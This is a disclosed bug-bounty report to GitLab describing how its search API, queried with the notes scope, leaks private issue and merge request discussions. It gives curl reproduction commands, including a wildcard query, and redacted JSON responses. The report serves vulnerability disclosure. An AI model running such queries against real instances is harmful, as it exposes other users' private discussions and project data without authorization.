Elastic search leaks private merge requests and issues discussions
HackerOne report #729760 by rpadovani on 2019-11-05, assigned to @jeremymatos:
Dev Issue
https://dev.gitlab.org/gitlab/gitlab-ee/issues/[REDACTED]
Summary
Using the Gitlab Search APIs, I am able to access objects of type notes that I shouldn't access. There are two kinds of these objects:
- notes in issues I have access to, but I shouldn't see the single note
- notes in merge requests I haven't access to
Steps to reproduce
I have access to the issue where this notes has been inserted, but not to the object referred in the notes itself:
11:32:29 in ~
➜ curl "https://gitlab.com/api/v4/projects/[REDACTED]/search?scope=notes&search=[REDACTED]" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 520 100 520 0 0 689 0 --:--:-- --:--:-- --:--:-- 688
[
{
"id": [REDACTED],
"type": null,
"body": "mentioned in issue [REDACTED]/gui#109",
"attachment": null,
"author": {
"id": [REDACTED],
"name": [REDACTED]",
"username": "[REDACTED]",
"state": "active",
"avatar_url": "https://secure.gravatar.com/avatar/[REDACTED]?s=80&d=identicon",
"web_url": "https://gitlab.com/[REDACTED]"
},
"created_at": "2019-02-19T12:54:23.670Z",
"updated_at": "2019-02-19T12:54:23.670Z",
"system": true,
"noteable_id": [REDACTED],
"noteable_type": "Issue",
"resolvable": false,
"noteable_iid": [REDACTED]
}
]
11:32:47 in ~
➜ curl "https://gitlab.com/api/v4/projects?search=virtualcore" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2 100 2 0 0 3 0 --:--:-- --:--:-- --:--:-- 3
[]
11:32:56 in ~
➜ curl "https://gitlab.com/api/v4/projects?search=VirtualCore" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100
[] While I don't have access at all to the merge requests where these notes come from - as you know, the code / MR / pipelines of customers.gitlab.com are private. Also, these information are (partially) available also through the GUI (see screenshot):
11:50:14 in ~ took 2s
➜ curl "https://gitlab.com/api/v4/projects/[REDACTED]/search?scope=notes&search=*&per_page=1" --header "PRIVATE-TOKEN: token" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1682 100 1682 0 0 1752 0 --:--:-- --:--:-- --:--:-- 1750
[
{
"id": [REDACTED],
"type": "DiscussionNote",
"body": "[REDACTED],
"attachment": null,
"author": {
"id": 4303974,
"name": "[REDACTED],
"username": "[REDACTED]",
"state": "active",
"avatar_url": "https://assets.gitlab-static.net/uploads/-/system/user/avatar/[REDACTED]/avatar.png",
"web_url": "https://gitlab.com/[REDACTED]"
},
"created_at": "2019-11-04T21:10:41.148Z",
"updated_at": "2019-11-05T07:33:07.584Z",
"system": false,
"noteable_id": [REDACTED],
"noteable_type": "MergeRequest",
"resolvable": true,
"resolved": false,
"resolved_by": null,
"noteable_iid": 520
}
]
Impact
Leaking notes and discussions that are private. This reveals discussions, names of files referred in discussions (with git sha), private project names and probably more.
Impact
Leaking notes and discussions that are private. This reveals discussions, names of files referred in discussions (with git sha), private project names and probably more.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
*[REDACTED]